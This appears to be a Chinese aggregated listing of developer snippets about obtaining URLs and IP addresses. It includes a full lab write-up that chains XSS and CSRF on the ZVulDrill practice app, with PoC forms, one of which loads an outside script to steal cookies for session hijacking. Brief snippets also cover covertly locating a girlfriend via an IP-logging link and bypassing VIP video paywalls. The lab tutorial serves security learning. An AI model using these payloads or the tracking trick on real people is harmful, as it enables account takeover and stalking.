-
怎么获取这个网站的图片的地址?
2015-01-27 16:34:26可能图片的地址和网页的地址属于同一个域名就不用启用这个选项。可以参考这贴: [url=http://stackoverflow.com/questions/3102819/disable-same-origin-policy-in-chrome#][/url] [color=#FF0000]启用这个选项是... -
php怎么获取远程网站上的图片的地址?有什么思路吗?
2016-04-13 10:16:41php怎么获取远程网站上的图片的地址?有什么思路吗? 比如获取百度的背景图片的路径 ... -
请求地址参数的问题,在请求地址栏有个参数怎么获取?
2019-10-24 17:43:11请求地址参数的问题,就是我在一个解析网站上解析B站的视频,他是向一个借口以post方式请求的数据但是请求地址里面有个callback参数,这个参数不知道怎么获取的,查过不是从服务器上面获取的,应该是从本地JS生成的... -
怎么获取其他网站的原视频播放链接
2017-05-16 19:21:33考虑到空间不足的原因,我想要在数据库中存储的是网上视频的url,而不是本地的视频地址。 我知道可以通过审查元素来找到,但是他是不齐全的路径,用一些工具也无法正常获取。 网上有很多解析接口,有的并不行有的... -
m3u8地址怎么获取_怎么下载腾讯课堂M3U8格式的视频
2020-12-25 11:24:20前言用过腾讯课堂的小伙伴们...首先,腾讯课堂的视频格式是M3U8的,可以直接获取M3U8的下载地址,然后直接用M3U8的下载器下载就可以了,这个方法同样也适用于其它M3U8格式的视频网站。现在来说一下具体步骤吧。一...前言
用过腾讯课堂的小伙伴们可能都知道,腾讯课堂播放时左右快进,后退的时候不太灵敏,有时候没反应,非常难受。我就想着能不能下载下来。在网上找了一圈都没有什么好用的方法。直到今天才找到方法,分享出来给大家使用。首先,腾讯课堂的视频格式是M3U8的,可以直接获取M3U8的下载地址,然后直接用M3U8的下载器下载就可以了,这个方法同样也适用于其它M3U8格式的视频网站。现在来说一下具体步骤吧。
一、获取M3U8地址
获取M3U8的方式有很多,我是用了一个chrome插件实现的,名字叫做视频下载器 - CoCoCut
视频下载器 - CoCoCut 下载好插件后,打开腾讯课堂的网站,然后点开想下载的视频的播放界面。点开插件就会弹出相应的选项,然后点击下载M3U8:
这时候会弹出一个界面,上面就会有M3U8的地址,复制这个链接到M3U8下载器就可以进行下载了。
二、使用M3U8下载器下载视频
我使用的M3U8下载器是在脚本之家下载的,用起来的感觉还可以,如果大家有更好用的可以在评论区留言分享。
下载好后解压直接打开就可以用了。
打开后界面很简单,使用起来也很容易,直接将刚才复制的地址粘贴到文件/链接处,然后输入一个文件名,之后点击添加按钮,就会添加到当前队列,点击全部开始即可
然后就会开始下载,下载速度还是挺快的,耐心等待即可。
下载完成后,文件就会出现在刚才解压的output目录下:
现在就可以观看了,感觉清晰度要比直接在腾讯课堂观看模糊一点,不过也还不错。如果打开失败,可以尝试换一个播放器。
-
网站做一个开户行选择的下拉框,银行的开户行地址这些数据怎么获取?
2015-12-10 17:24:15网站做一个开户行选择的下拉框,银行的开户行地址这些数据怎么获取? 就是一个网站,让用户选择开户行的,这些数据怎么获得啊 -
aspnet 怎么获取浏览器等客户端请求的url地址?
2011-08-17 08:14:22怎么获取客户端请求的url地址,请参阅下面的代码: /// /// 获得当前请求网站的URL /// /// protected string GetHostUrl() { string AppUrl怎么获取客户端请求的url地址,请参阅下面的代码:
/// <summary> /// 获得当前请求网站的URL /// </summary> /// <returns></returns> protected string GetHostUrl() { string AppUrl = "http://{0}{1}"; string host = this.Request.Url.Host; if (!Request.Url.IsDefaultPort) host += ":" + Request.Url.Port; return string.Format(AppUrl, host, Request.Url.AbsolutePath.ToString()); }
主要用到的类:Url -
csrf怎么获取 其他网站cookie_当XSS遇上CSRF
2020-12-21 18:21:19实验环境: ZvulDirll[请用下面我简单修改过的版本] 下载地址:链接: http://pan.baidu.com/s/1kUwQ6R9 密码: 92tc一、安装:0x00:解压ZVulDrill压缩包,将其放在www目录下,也就是你的网站根目录。0x01、编辑...今天我们来介绍一个场景,当xss遇上csrf的时候,是否能打出一套漂亮的组合技能。
实验环境:
ZvulDirll[请用下面我简单修改过的版本]
下载地址:链接: http://pan.baidu.com/s/1kUwQ6R9 密码: 92tc一、安装:
0x00:解压ZVulDrill压缩包,将其放在www目录下,也就是你的网站根目录。
0x01、编辑ZVulDrillsysconfig.php中的数据库账号和密码
0x02、打开mysql终端,创建zvuldrill数据,使用下面的sql语句。
create database zvuldrill;0x03、然后开始导入sql语句进zvuldrill数据库。
use zvuldrill;
source F:/wamp/www/ZVulDrill/sys/zvuldrill.sql;0x04、打开浏览器,访问
http://localhost/ZVulDrill/二、寻找Xss漏洞
0x00、搜索框的xss
一开始打开这个web应用,我们可以大概看到的功能点,比如搜索留言、用户登录和注册、留言。而一般俩说搜索框容易出现xss或者sql注入的问题。
(1)我们先输入一些内容进行搜索,比如2333333。如下图可以看到,我们搜索的内容显示在页面上。我们右键查看一下元素,观察2333333在什么标签之间。如下图,2333333并没有被什么标签包裹住。
我们将搜索的内容变成<h1>test</h1>,点击回车。可以看到页面上多了一个以h1标签显示的test字符串,也就是这里存在xss漏洞。网站后台并没有净化我们的特殊字符,使得我们输入的数据被当做成是标签来解析。效果如下图。
这里是一个存在XSS漏洞的点。0x01、
注册一个账号后,登录之后进行测试。
1)像这种留言板,一般在留言处比较容易出现xss漏洞。我们先试试在留言处输入一堆异常字符看看是否会被转义。如下图,我们输入2333'"&#;<>,点击留言即可。
然后我们右键查看网页源代码,搜索"2333",我们看一下我们异常字符被怎样处理。
可以看到这里2333是被td标签包裹住,要是我们想插入我们的javascript代码,那我们需要先闭合<td>,可是我们的<>都被转义了。这里行不通。2)我们继续看一看这里有的功能,有个编辑功能。点击进去看看。如下图,这里我们可以修改我们的用户名,而用户名的输出点,当前页面有一个,注意右上角的小框,那里是显示用户的用户名。
我们右键查看元素,查看一下右上角小框是被什么标签所包裹住。如下图,这里的用户名是被a标签包裹住的,我们尝试一下闭合a标签然后插入一段javascript代码看看。
修改用户名为test</a><script>alert(1)</script><a>
我们点击更新按钮,查看一下效果。可以看到这里,执行了script标签内的alert函数。也就是这里存在一个注入点。我们修改一下alert的内容,即可获取cookie值。
修改用户名为test</a><script>alert(document.cookie)</script><a>
我们正确的获取到了cookie值,但是这里的xss只能叉自己,我们怎样才能让这里的xss发挥真实的作用,盗取他人的cookie信息,而不仅是自己的呢?三、CSRF漏洞
正如CSRF漏洞是伪造别人发出某个请求,致使别人在不知情的情况下执行某个操作,如修改密码、留言、添加用户等等。0x00、如何测试是否存在CSRF漏洞
1)这里需要用到Brupsuite来对网站后台的防御进行一些分析。第一个是观察发出的请求是否带有随机的Token值;第二个是分析网站后台是否对Referer进行校验。
我们配置好浏览器的代理为Brupsuite监听的端口。点击更新用户名,Brupsuite抓取数据包。如下图
可以看到Post的数据包中并没有出现token字眼,随机数token一般是网站用来防御CSRF的一个措施。除了Token,我们还有两个要点要分析。第一个要点,网站是否校验了请求的Referer,这个Http header是用来表示请求的来源地址是什么。如果是CSRF的话,那么Referer的值将会为空。
2)我们在数据包的空白处右键,send to repeater,发到repeater方便我们修改数据之后重放请求。这里我们将上面Post数据中的Referer那一行删除掉。
删除后,点击Go按钮。返回内容如下图。
返回的数据包将我们重定向到edit.php,我们继续点击follow redirection按钮,观察一下返回的页面内容。我们再下面的搜索框那里输入demo11,可以发现有两处匹配到了。说明我们这里修改成功,在Http header没有附带Referer的情况下。
3)接下来我们要对最后一个要素进行验证,就是Post数据中的id参数。我们要验证id参数的存在是否影响我们修改用户名。我们同样是在Repeater里面,把Post数据中的id参数删除掉,同时我们把username也修改成demo22,用来与上一次的修改区分开。如下图。
修改完成之后,我们点击Go按钮,让数据包发送。如下图,返回的响应还是302,将我们重定向edit.php,但是页面中还有Php的Notice信息,提醒我们id变量不存在。
我们继续点击follow redirection。然后再右下角的搜索框那里搜索demo22。
可以看到在下图,demo22出现了两次,说明我们修改成功。也就是说,这里的id参数并没有影响我们修改用户名。通过上面的两次分析。我们可以确定这里存在着CSRF漏洞。下面我们写一个简单的页面去测试。
4)测试CSRF的Poc
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>测试CSRF漏洞Poc</title>
</head>
<body>
<form action="http://localhost/ZVulDrill/user/updateName.php" method="post" name="update_name" id="Poc">
<input type="hidden" name="username" value="hacker" class="form-control" id="inputEmail">
<input type="hidden" name="update" class="btn btn-primary" value="更新"/>
</form>
<script type="text/javascript">
var formTag = document.getElementById("Poc");
formTag.submit();
</script>
</body>
</html>
我们复制上面的内容到文本编辑器,然后保存为poc.html。然后在登录了Zvudrill之后,在同一浏览器打开poc.html。
下图是我的brupsuite抓取到poc发送到网站的请求,可以发现并没有Referer值。
我们把brupsuite的代理功能关闭。然后查看一下Poc的效果。可以看到下图中的用户名已经被修改成hacker。
四、综合利用
1)、经过上面的分析,我们知道更新用户名这里的username并没有过滤特殊字符可以造成xss,然后更新用户名发送的请求存在CSRF,可以在用户点击的时候,修改用户的用户名。因而我们可以写出下面的Poc。
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>测试CSRF漏洞Poc</title>
</head>
<body>
<form action="http://localhost/ZVulDrill/user/updateName.php" method="post" name="update_name" id="Poc">
<input type="hidden" name="username" value="demo</a><script>alert(document.cookie)</script><a>" class="form-control" id="inputEmail">
<input type="hidden" name="update" class="btn btn-primary" value="更新"/>
</form>
<script type="text/javascript">
var formTag = document.getElementById("Poc");
formTag.submit();
</script>
</body>
</html>
我们点击源代码为上述代码的html页面之后,将会出现这样的效果。2)当然,我们这里的value还可以是包含一段恶意的js代码,可以窃取当前用户的cookie到xss平台。之后便可以使用盗取的cookie全仿造用户的身份去做其他操作了。
下面我使用Xss平台的一个盗取cookie的链接,Xss平台的注册地址
Poc如下:
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>测试CSRF漏洞Poc</title>
</head>
<body>
<form action="http://localhost/ZVulDrill/user/updateName.php" method="post" name="update_name" id="Poc">
<input type="hidden" name="username" value="test</a><script src=http://t.cn/RG3kRlu></script><a>" class="form-control" id="inputEmail">
<input type="hidden" name="update" class="btn btn-primary" value="更新"/>
</form>
<script type="text/javascript">
var formTag = document.getElementById("Poc");
formTag.submit();
</script>
</body>
</html>[1]我在Firefox浏览器进行登录,然后再Firefox浏览器打开poc.html。然后在chrome浏览器利用cookie进行登录。
在登录Firefox进行登录,如下图我们再Firefox中打开poc.html,如下图
[2]我们登录xss平台,找到创建的项目。可以看到已经获取到了受害者的cookie。
[3]利用盗取的cookie,在chrome浏览器直接仿造身份。
step1:访问Xss平台中获取的Referer的urlstep2:通过Chrome的EditThisCookie插件,重写我们的cookie。
step3:再次访问Referer对应的url,观察效果。如图
五、写在最后
写在最后,在攻防中重要的是人思考漏洞,对待漏洞的思路。在有想法的白帽子手中,不同漏洞的组合会起到高危漏洞的效果。我们不能期待每一次都遇到高危漏洞,我们只能改变我们对待漏洞的看法。
-
js怎么获取td里面的内容_实战经验分享:怎么在自己的网站里面调用第三方网站的页面内容
2020-12-01 17:14:20有一个是【mip验证】的工具入口,其实我在其他网站也放了这个入口,但是不同的是,以前的页面入口是直接链接到百度mip官方的页面检测地址的,而今天,我这个网站的页面地址改成自己的网站地址,为:...今日,站长在线(olzz.com)的首页右侧边栏里面,有一个是【mip验证】的工具入口,其实我在其他网站也放了这个入口,但是不同的是,以前的页面入口是直接链接到百度mip官方的页面检测地址的,而今天,我这个网站的页面地址改成自己的网站地址,为:https://www.olzz.com/mip/
使用这样做的方法显著的好处就是,可以把网站的流量放在自己的网站里面,知道使用这个工具的人有多少,一样的使用效果,却给自己带来更多的浏览量,何乐不为呢?
网页代码
接下来,站长在线的站长就开始,对代码进行尝试添加了:
1、确立MIP标准。因为站长在线的主站是mip技术的,所以我想在这个新建的内页也使用mip技术,所以首先制作一个index.html的静态的MIP单页面,然后把mip技术的标准页面的空白文件制作出来,代码我就是不一一解释怎么来了,直接上代码了:
网页标题 正文内容
空白文件制作好了,就开始填充内容,最后本页面里面,还要添加cnzz统计和百度统计。
1、添加百度mip检测的页面调用代码,并且让他居中显示:
2、添加cnzz统计、百度统计的代码。
3、合并所有代码,完整的代码如下:
MIP页面检测,查看是否符合百度mip页面标准
总结:通过本内容的学习,可以让你知道,怎么在自己的网站里面调用第三方网站的页面内容,新手朋友们自己亲自实践一下,举一反三,让自己的建站水平稳步提升。
欢迎关注站长快递头条号,一起学习建站知识,一起成长!
-
获取http地址如何从上面抓取图片_给你代码:网站图标favicon自动抓取
2020-11-27 23:57:38最近的一个项目有关网站图标爬取,所以将一些...浏览器是怎么得到网站图标的?浏览器首先会分析请求的网址源代码的head部分,找到带有rel="icon"属性的link元素,其中href属性就是图标地址,但是并不是所有网站都会... -
psat获取地址
2019-02-13 11:58:27我真的找这个资源找得烦死了,现在直接附上链接 http://faraday1.ucd.ie/psat.html 网站里面有各种版本的psat工具包,根据自己matlab版本下载对应的版本就行了,版本怎么对应就自己百度咯。 ... -
通过IP获取地址
2013-02-01 13:04:00最近想自己做访问日志,而且想通过用户的IP获取用户的地址,网上搜了一下,好像都是用qq的库来搜索,自己试验了一下都不怎么准,又没有什么服务可以使用。 于是自己想了一个办法,通过网站查询,然后获取返回的html... -
html图片下载链接怎么弄_如何获取HTML页面中的图片地址并将图片下载保存到自己的网站目录?...
2021-02-06 20:11:17做文章类的网站,难免存在抄袭或修改别人的文章,占为己有的可能!并非是偷者有罪,而是奉行拿来主义;毕竟个人的观点和学问都有所限制,不可能面面俱到;拿别人的不等于偷,更有可能的就是,在别人的基础之上在进行... -
用Java怎么获取用户的行为?
2015-04-24 11:42:23怎么用Java语言获取浏览器上的行为(例如复制,粘贴等)... 怎么获取用户浏览网页的地址? 比如获取用户浏览网页时候的HTTP请求来判断用户访问过哪些网站。。。? 想做个小程序在用户电脑执行。。 需要看一些什么呢? -
jquery中获取浏览器地址信息
2015-05-07 00:21:41jquery中获取浏览器地址信息这次做电商购物网站时,遇到点击商品时要跳转到本商品的详细页面,怎么来对应这个详细页面? 首先想到要传值过去(对应数据库中的id), 把这个id是存储在后台,(增加了后台的请求次数)... -
网站获取ip代码怎么写_一分钟内获取女朋友的精确定位位置(附电脑版的IP定位工具+9大素材网站解析下载方法...
2020-12-02 00:11:27首先,我们可以借助一个网站获取她的IP地址那里还有WiFi定位的,感兴趣的朋友可以自己测试一下然后点击生成key(如下图)如下图,随便输入内容,我就输入“uiopjkl”然后点击生成专属url然后复制链接发送给你的好友... -
python怎么看vip视频代码_python获取各大网站的vip视频播放功能的实现
2021-01-29 21:51:401、首先使用 https://jx.618g.com/?url=URL :URL:为所要播放的电影或者电视剧的url,即各大网站的播放地址;2、利用https://jx.618g.com/?url=URL ,requests.get(https://jx.618g.com/?url=URL)会返回一个html代码... -
[Java] 通过域名获取IP地址的方法与作用
2016-06-16 14:57:03在学Java过程中,接触到了java.net包,发现其中有一个InetAddress类,可以使用它的静态方法getByName获取IP地址,刚开始还没怎么注意到它的作用。在之后的学习中接触到了DNS域名解析,了解到我们访问网站的时候其实... -
ssl协议如何开启是正确的 怎么获取ssl证书
2020-12-14 11:44:41原地址:https://www.ssfiction.com/seoyh/2008.html----猴子技术宅 SSL商业的价格昂贵,很多SEO优化人员觉得麻烦所以也就懒得去搞,其实前面不弄也没什么,只是网站流量起来后,就会出现各种想都想不到的事情,让你... -
白帽子,强大的XSS钓鱼漏洞,怎么获取用户的真实ip
2019-11-20 15:09:10怎么获取用户的真实ip 在一些网站和一些用户(黑客)一般是对自己的ip进行处理,找不到真实的ip地址 11种绕过CDN查找真实IP方法 一.验证是否存在CDN 1.很简单,使用各种多地 ping 的服务,查看对应 IP 地址是否唯一... -
获取referer_怎么增加referer校验
2020-12-08 02:18:42按F12调试工具可查看2.referer的作用:防止盗连,比如我是个下载软件的网站,在下载页面我先用referer来判断上一页面是不是自己网站,如果不是,说明有人盗连了你的下载地址防盗链方法代码:3.通过设置referer不是... -
一个网站的入口是A.com/test.aspx?sn=xxxxxx 跳转到B.com/ts.aspx .请问怎么通过程序获取到跳转后的地址呢
2015-09-08 16:26:29一个网站的入口是A.com/test.aspx?sn=xxxxxx 跳转到B.com/ts.aspx .请问怎么通过程序获取到跳转后的地址呢 -
Java 本地请求获取远程图片地址显示到页面
2016-10-01 04:02:05如,自己网站A,怎么获取其他网址的图片显示到页面。 如: 其他网址图片链接">。 意思就是我想通过自己写的这个getPicture.do请求,参数为其他网站的图片。显示到页面上,怎么实现 -
python获取网站信息_关于python模拟登陆抓取网站信息
2020-11-30 12:02:58以及访问需要抓取的页面时的header(变量listheader),但运行完程序后我输入r.url发现返回的地址是https://list.lu.com/notFound.html,而不是我指定的具体页面,请问是怎么回事呢?im... -
iformfile怎么获取图片路径_自学三个月的我,利用Python爬虫获取精美素材图片,看看我是怎么做到的(实战篇...
2021-01-13 16:11:05二、项目目标1、根据给定的网址获取网页源代码。2、利用正则表达式把源代码中的图片地址过滤出来。3、过滤出来的图片地址下载素材图片。三、涉及的库和网站1、网址如下:https://www.51miz.com/2、涉及的库:... -
请问如何在文本框里获取一个http地址
2015-09-10 14:36:28有一个文本框时要自动获取一个网站地址显示到文本框中(不是当前页面url)。该怎么做呀,是不是要用js解析那个URL呀,具体怎么做呀“http://dd.myapp.com/16891/148FD03E4F11362D6A5688E6022045D8.apk”就是这样的。... -
C# winfrom获取外网IP地址和物理地址
2012-05-21 13:43:53这下慌啊,。后来找到一个网站 www.ip138.com 进去看了一下惊喜啊,我要的... 可是,怎么样能将我想要的物理地址拿出来,放在我自己的项目中呢。 下面的代码能解释一切 try { string strUrl = "http
-
mac(13) : 时钟同步
-
基于python的dango框架购物商城毕业设计毕设源代码使用教程
-
零基础极简以太坊智能合约开发环境搭建并开发部署
-
MySQL 触发器
-
安装loadrunner出现管理员阻止安装应用的解决办法
-
SWAC 电气设备选型资料大全
-
常见面试问题-自我介绍、离职原因、期望薪资…(含面试答案)
-
MySQL 数据库权限管理(用户高级管理和精确访问控制)
-
access应用的3个开发实例
-
git 使用
-
IFM 电气设备选型资料大全
-
用Go语言来写区块链(一)
-
PodfileKit将github上常见的iOS(Swift)第三方框架进行了汇总,并且将框架进行了分类,为用户管理第三方框架提供了方便。
-
DipTrace 4.0.0.5 x64_fu11.rar
-
2021年B2B内容营销白皮书.pdf
-
【布道者】Linux极速入门
-
spring源码编译测试全流程
-
2021年 系统架构设计师 系列课
-
如何编写用户故事的验收标准
-
什么是微内核架构设计?